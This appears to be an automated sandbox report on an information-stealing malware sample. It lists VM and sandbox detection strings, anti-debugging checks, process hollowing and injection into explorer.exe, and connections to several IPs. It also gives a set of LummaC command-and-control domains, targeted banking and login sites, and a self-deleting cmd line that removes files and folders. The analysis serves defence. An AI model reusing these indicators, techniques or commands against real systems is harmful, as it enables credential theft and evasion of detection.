                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\aarhevhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: aarhevh, 00000011.00000002.4461497269.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, 00000000.00000002.2051697711.00000000004E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKPF{/"
                  Source: aarhevh, 00000004.00000002.2290240052.00000000005E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKX~
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007C32E7 rdtsc 5_2_007C32E7
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 402Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2081Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 819Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 360Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2587Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\freebl3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\softokn3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\nss3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\explorer.exe TID: 6472Thread sleep count: 402 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7084Thread sleep count: 2081 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7084Thread sleep time: -208100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 1412Thread sleep count: 819 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1412Thread sleep time: -81900s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6972Thread sleep count: 257 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7152Thread sleep count: 342 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7152Thread sleep time: -34200s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6596Thread sleep count: 360 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6596Thread sleep time: -36000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7084Thread sleep count: 2587 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7084Thread sleep time: -258700s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe TID: 2624Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3848Thread sleep count: 66 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\aarhevhLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FEBF0 PR_GetNumberOfProcessors,GetSystemInfo,13_2_6C9FEBF0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: JEBKEH.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: JEBKEH.13.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.000000000091E000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: JEBKEH.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: JEBKEH.13.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: JEBKEH.13.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: JEBKEH.13.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JEBKEH.13.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                  Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: JEBKEH.13.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware\Pr
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2037994793.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: JEBKEH.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: JEBKEH.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: 21AE.exe, 00000005.00000002.2691719782.00000000007E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpn
                  Source: JEBKEH.13.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: JEBKEH.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+<
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JEBKEH.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JEBKEH.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JEBKEH.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JEBKEH.13.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JEBKEH.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JEBKEH.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JEBKEH.13.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JEBKEH.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JEBKEH.13.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: JEBKEH.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: JEBKEH.13.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JEBKEH.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: JEBKEH.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007C32E7 rdtsc 5_2_007C32E7
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00402A9F LdrLoadDll,0_2_00402A9F
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_6CACAC62
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007BE06B push dword ptr fs:[00000030h]5_2_007BE06B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0214092B mov eax, dword ptr fs:[00000030h]5_2_0214092B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02140D90 mov eax, dword ptr fs:[00000030h]5_2_02140D90
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_6CACAC62

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Benign windows process drops PE files
                  Source: C:\Windows\explorer.exeFile created: C9A7.exe.2.drJump to dropped file
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.143.58.5 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 186.112.12.192 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory allocated: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,12_2_042DA4F0
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeThread created: C:\Windows\explorer.exe EIP: 33219E0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhThread created: unknown EIP: 31919E0Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 value starts with: 4D5AJump to behavior
                  LummaC encrypted strings found
                  Source: 21AE.exeString found in binary or memory: zippyfinickysofwps.shop
                  Source: 21AE.exeString found in binary or memory: obsceneclassyjuwks.shop
                  Source: 21AE.exeString found in binary or memory: acceptabledcooeprs.shop
                  Source: 21AE.exeString found in binary or memory: whispedwoodmoodsksl.shop
                  Source: 21AE.exeString found in binary or memory: boredimperissvieos.shop
                  Source: 21AE.exeString found in binary or memory: holicisticscrarws.shop
                  Source: 21AE.exeString found in binary or memory: sweetsquarediaslw.shop
                  Source: 21AE.exeString found in binary or memory: plaintediousidowsko.shop
                  Source: 21AE.exeString found in binary or memory: miniaturefinerninewjs.shop
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Sample uses process hollowing technique
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection unmapped: C:\Users\user\AppData\Local\Temp\katA304.tmp base address: 400000Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 422000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 42E000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 641000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB14760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,13_2_6CB14760
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,13_2_6C9F1C30
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000002.00000000.2037854889.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACAE71 cpuid 13_2_6CACAE71
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_6CACA8DC
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA18390 NSS_GetVersion,13_2_6CA18390
